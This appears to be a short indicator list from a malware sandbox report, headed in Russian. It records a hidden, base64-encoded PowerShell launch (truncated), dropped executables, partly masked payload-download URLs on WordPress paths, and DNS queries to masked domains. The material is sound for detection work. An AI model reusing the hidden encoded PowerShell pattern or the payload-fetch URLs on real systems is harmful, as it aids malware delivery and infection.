Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABQAGUAZwB4AGkAagByAGsAdgBwAD0AJwBEAGUAbgBsAGsAdQB3AGQAdQBmAHoAJwA7ACQAUABhAHAAbgBvAHkAZABzAHgAIAA9ACAAJwA1ADEAMQAnADsAJABHAGwAegBpAGEAZwBwAGoAPQAnAEYAZQBkAHIAeQB2AHQAbwBhAG4AJwA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1476
- %TEMP%\1317912.cvr
- %HOMEPATH%\511.exe
- %HOMEPATH%\511.exe
- 'fa###osarli.com':80
- 'fa###osarli.com':443
- 'ja###ahan.com':80
- http://fa###osarli.com/wp-admin/mYZW0/
- http://ja###ahan.com/wp-content/hqiw1u9/
- 'fa###osarli.com':443
- DNS ASK th####tinochuks.com
- DNS ASK sa####fallahi.com
- DNS ASK fa###osarli.com
- DNS ASK ja###ahan.com
- DNS ASK vi##tory.ca